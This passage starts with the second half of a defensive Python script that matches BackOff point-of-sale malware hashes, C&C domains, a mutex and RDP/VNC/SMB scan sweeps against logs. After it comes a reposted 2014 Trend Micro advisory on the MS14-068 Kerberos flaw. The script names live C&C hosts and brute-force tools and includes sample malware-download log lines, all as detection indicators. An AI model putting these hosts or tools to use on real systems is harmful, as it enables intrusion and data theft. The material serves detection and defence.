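    "7a5580ddf2eb2fc4f4a0ea28c40f0da9": "r0.exe (BackOff)",
    "0fb00a8ad217abe9d92a1faa397842dc": "3-2.exe (BackOff)",
    "028c9a1619f96dbfd29ca64199f4acde": "DK Brute priv8.rar",
    "9223e3472e8ff9ddfa0d0dbad573d530": "IPCity.rar",
    "01d12f4f2f0d3019756d83e94e3b564b": "VUBrute 1.0.zip",
    "5843ae35bdeb4ca577054936c5c3944e": "logmein_checker.rar",
    "8b5436ca6e520d6942087bb38e97da65": "portscan.rar",
    "f9cbd1c3c48c873f3bff8c957ae280c7": "something.zip",
}
C2_HOSTS = {
    "143biz.cc.md-14.webhostbox.net", "cyberwise.biz", "verified-deal.com",
    "kitchentools.ru", "cyclingtools.ru", "biketools.ru", "blog.wordpress-catalog.com",
}
BACKOFF_MUTEX = "aMD6qt7lWb1N3TNBSe4N"
LATERAL_PORTS = {445: "SMB", 3389: "RDP", 5900: "VNC"}   # the ports KPortScan3 was used against

# Pulls the host out of "GET http://host/..." and "CONNECT host:port" proxy log entries.
_HOST_RE = re.compile(r"(?:https?://|CONNECT )([A-Za-z0-9.-]+)")


def match_hashes(inventory):
    """inventory: iterable of (path, md5hex). Returns [(path, label)] for hashes named in the post."""
    return [(p, KNOWN_MD5[h.lower()]) for p, h in inventory if h.lower() in KNOWN_MD5]


def scan_proxy_log(lines):
    """Returns [(line_no, host)] for every request whose host is a known C&C."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _HOST_RE.search(line)
        if m and m.group(1).lower() in C2_HOSTS:
            hits.append((n, m.group(1).lower()))
    return hits


def find_scanners(flows, min_targets=10):
    """flows: iterable of (src, dst, dport). Returns sources that touched >= min_targets distinct
    hosts on SMB/RDP/VNC, the sweep a port scanner plus an RDP/VNC brute forcer leaves behind."""
    targets = defaultdict(set)
    for src, dst, dport in flows:
        if dport in LATERAL_PORTS:
            targets[src].add(dst)
    return sorted(s for s, t in targets.items() if len(t) >= min_targets)


def match_mutexes(names):
    """names: mutex names observed on a host (e.g. from a handle listing)."""
    return [n for n in names if n == BACKOFF_MUTEX]


# Constructed sample data (not from the post).
INVENTORY = [
    (r"C:\Windows\Temp\r0.exe", "7A5580DDF2EB2FC4F4A0EA28C40F0DA9"),
    (r"C:\Users\pos\Desktop\notes.txt", "d41d8cd98f00b204e9800998ecf8427e"),
    (r"D:\tools\VUBrute 1.0.zip", "01d12f4f2f0d3019756d83e94e3b564b"),
]
PROXY_LOG = [
    "2014-11-19T10:01:02 10.0.0.21 GET http://143biz.cc.md-14.webhostbox.net/r0.exe 200",
    "2014-11-19T10:01:05 10.0.0.21 POST https://cyberwise.biz/register/register.php 200",
    "2014-11-19T10:02:11 10.0.0.30 GET https://www.example.com/ 200",
    "2014-11-19T10:03:40 10.0.0.21 CONNECT verified-deal.com:443 200",
]
FLOWS = [("10.0.0.5", "10.0.1.%d" % i, 3389 if i % 2 else 5900) for i in range(1, 13)] + [
    ("10.0.0.9", "10.0.1.1", 445), ("10.0.0.9", "10.0.1.2", 445), ("10.0.0.5", "10.0.1.200", 80)]

if __name__ == "__main__":
    print("hash matches:", match_hashes(INVENTORY))
    print("C&C contacts:", scan_proxy_log(PROXY_LOG))
    print("scanners:    ", find_scanners(FLOWS))
    print("mutex:       ", match_mutexes(["Global\\foo", BACKOFF_MUTEX]))
```

The min_targets threshold in find_scanners is the knob to tune per environment: a PoS segment should see almost no one opening RDP or VNC to a dozen terminals in a row, so the threshold can be low there and the source worth blocking outright.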

Post from: Trendlabs Security Intelligence Blog - by Trend Micro


Categories: security

Patched Windows Vulnerability Allows For Remote Privilege Escalation

Trend-Micro - Wed, 11/19/2014 - 08:53

Microsoft has released an out-of-band security bulletin (MS14-068) that addresses a vulnerability in the implementation of Kerberos in various versions of Windows. The bulletin states that this vulnerability is already being used in “limited, targeted attacks”. This warning, plus the fact that Microsoft considered this threat serious enough to merit an out-of-cycle patch, should make users consider patching as soon as possible.

Kerberos is a protocol used to authenticate users within a network. This vulnerability (designated as CVE-2014-6324) could allow an attacker to escalate privileges to that of a domain administrator; this could then be used to compromise any system connected to that domain, including domain servers.

This is a serious flaw which lends itself to usage in targeted attacks. An attacker will have to use separate means to penetrate a network, but once inside this vulnerability could be used to compromise any machine connected to the organization’s domain server (effectively, all machines).

Used properly, this vulnerability is as effective a tool for moving laterally within an organization as any known today. No workaround or mitigation has been identified by Microsoft other than patching; the only requirement for a successful attack is that the attacker already holds valid domain credentials. For an attacker who has already penetrated the network, this hardly represents a barrier.

The damage an attacker could do if an organization’s domain server was compromised could be significant. In a worst case scenario, the entire domain would have to be rebuilt from the ground up, which would be extremely costly in time and resources for any organization.

Microsoft itself suggests that this attack has been used in targeted attacks saying that they “are aware of limited, targeted attacks that attempt to exploit this vulnerability.” With knowledge that a vulnerability exists, and information provided by the patch, we can expect to see more attacks that target this flaw in the future.

The vulnerability is present in all server versions of Windows from Server 2003 onward. Administrators should immediately roll out patches to these systems as soon as is practical. A patch is available for client versions of Windows, but this is a defense-in-depth upgrade that does not address any vulnerabilities.

Post from: Trendlabs Security Intelligence Blog - by Trend Micro


Categories: security